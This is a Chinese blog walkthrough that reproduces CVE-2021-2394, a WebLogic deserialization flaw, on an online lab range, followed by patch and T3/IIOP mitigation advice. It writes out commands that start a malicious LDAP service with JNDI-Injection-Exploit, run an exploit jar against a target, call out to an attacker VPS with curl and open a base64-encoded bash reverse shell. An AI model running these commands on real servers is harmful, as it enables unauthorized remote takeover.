WebLogic反序列化漏洞复现+利用工具(CVE-2021-2394)

1、漏洞概述

Oracle官方发布了2021年7月份安全更新通告,通告中披露了WebLogic组件存在高危漏洞,攻击者可以在未授权的情况下通过IIOP、T3协议对存在漏洞的WebLogic Server组件进行攻击。成功利用该漏洞的攻击者可以接管WebLogic Server。

这是一个二次反序列化漏洞,是CVE-2020-14756和CVE-2020-14825的调用链相结合组成一条新的调用链来绕过weblogic黑名单列表。

2、影响范围

Oracle WebLogic Server 10.3.6.0.0

Oracle WebLogic Server 12.1.3.0.0

Oracle WebLogic Server 12.2.1.3.0

Oracle WebLogic Server 12.2.1.4.0

Oracle WebLogic Server 14.1.1.0.0

3、复现环境

   vulfocus在线靶场

a6c2b0ddd722484c98bb91cfca855a47.png

4、漏洞复现 

复现所需以下工具:

JDNI注入:https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0 

 漏洞利用:https://download.csdn.net/download/qq_41904294/87667743

启动靶场,检查环境是否就绪(复现版本:12.2.1.3.0)

33b6a91de4224ca0b565c2489565fe8c.png

使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 开启一个恶意ldap服务,这里让他执行一个curl

指令

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "curl vpsip" -A vpsip

python3启动一个http服务

python3 -m http.server 80

使用漏洞利用工具进行恶意注入

 java -jar weblogic\ tools.jar -H 123.58.224.8 -P 30706 -payload 20212394 -jndi ldap://x.x.x.x:1389/xxx

# -H是目标地址(weblogicServerIP) -P是目标端口 -jndl 是开启的ldap服务地址

43a998f9d46a44ccab673137ff4f98ab.png

265e2f1f9a7d4c36b39e1821ffed63fd.png 3965b3e585f74ef984e014a16e684677.png

可以看到,成功执行了curl指令

反弹shell

 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 开启一个ldap服务

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,base64加密的反弹shell指令}|{base64,-d}|{bash,-i}" -A VPSip

瑞士军刀提前开启监听,利用工具包让目标加载ldap服务并执行反弹shell操作

91d4ba384e6044838e428d55e51e2ea6.png

8d107cfdacf34f1fb54853b52dced2a0.png 成功反弹,读取flag

1a85209fdb834b9f8a5e538cde2d7f57.png

 5、修复建议

补丁更新

Oracle目前已发布补丁修复了上述漏洞,请用户参考官方通告及时下载受影响产品更新补丁,并参照补丁安装包中的readme文件进行安装更新,以保证长期有效的防护。

注:Oracle官方补丁需要用户持有正版软件的许可账号,使用该账号登陆https://support.oracle.com后,可以下载最新补丁。

临时缓解措施

如果用户暂时无法安装更新补丁,可通过下列措施对漏洞进行临时防护:

(1)限制T3协议访问

用户可通过控制T3协议的访问来临时阻断针对利用T3协议漏洞的攻击。WebLogic Server 提供了名为 weblogic.security.net.ConnectionFilterImpl 的默认连接筛选器,此连接筛选器接受所有传入连接,可通过此连接筛选器配置规则,对T3及T3s协议进行访问控制。

(2)禁用IIOP协议

用户可通过关闭IIOP协议阻断针对利用IIOP协议漏洞的攻击。

参考链接

https://www.oracle.com/security-alerts/cpujul2021.html#AppendixFMW

猜你喜欢

转载自blog.csdn.net/qq_41904294/article/details/130033914